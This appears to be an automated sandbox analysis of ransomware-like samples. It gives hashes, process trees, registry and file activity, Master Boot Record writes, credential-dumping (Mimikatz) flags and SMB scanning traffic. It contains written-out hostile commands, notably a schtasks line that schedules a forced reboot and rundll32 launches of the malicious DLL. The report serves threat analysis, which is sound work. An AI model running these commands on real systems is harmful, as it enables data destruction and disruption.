C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun

MD5 62b1443d82968878c773a1414de23c82
SHA1 192bbf788c31bc7e6fe840c0ea113992a8d8621c
SHA256 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24
SHA512 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun

MD5 bca915870ae4ad0d86fcaba08a10f1fa
SHA1 7531259f5edae780e684a25635292bf4b2bb1aac
SHA256 d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037
SHA512 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun

MD5 14145467d1e7bd96f1ffe21e0ae79199
SHA1 5db5fbd88779a088fd1c4319ff26beb284ad0ff3
SHA256 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38
SHA512 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7

memory/2700-3768-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-3769-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-3770-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-3773-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

memory/2700-3774-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win7-20241010-en

Max time kernel

103s

Max time network

19s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 ab1cbe0449635193d9cfa104d39f09c6
SHA1 467a53f8a081756def932a026743bbf544cc6dd9
SHA256 f49ce94f67824759eced661bb6ed2d46eedb7669821e570828ce7d59650cae77
SHA512 81045e8ea0c6e44176efb9f7cd832d8be4ea790be1d042adc1cada8e14a3a538310bbc480def68118b7eeff3987f8ed7c1be29a117ca206acce594b5ca564f08

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

149s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ADE3.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\UnprotectConfirm.rar C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\MergeClose.dwg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ADE3.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36

C:\Users\Admin\AppData\Local\Temp\ADE3.tmp

"C:\Users\Admin\AppData\Local\Temp\ADE3.tmp" \\.\pipe\{7A18E02B-C389-425E-8EC2-0C9D6B53B827}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:36

Network

Country Destination Domain Proto
FI 37.27.61.181:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.0:445 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
FI 37.27.61.181:139 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.0:139 tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
N/A 10.127.0.3:445 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
N/A 10.127.0.15:139 tcp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/5004-0-0x0000000002AF0000-0x0000000002B4E000-memory.dmp

memory/5004-8-0x0000000002AF0000-0x0000000002B4E000-memory.dmp

memory/5004-9-0x0000000002AF0000-0x0000000002B4E000-memory.dmp

memory/5004-11-0x0000000002AF0000-0x0000000002B4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ADE3.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/5004-22-0x0000000002AF0000-0x0000000002B4E000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-28 22:32

Reported

2024-11-28 22:35

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

Signatures

Mimikatz

mimikatz

Mimikatz family

mimikatz

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B6EC.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\ImportPublish.asp C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\javafx-src.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
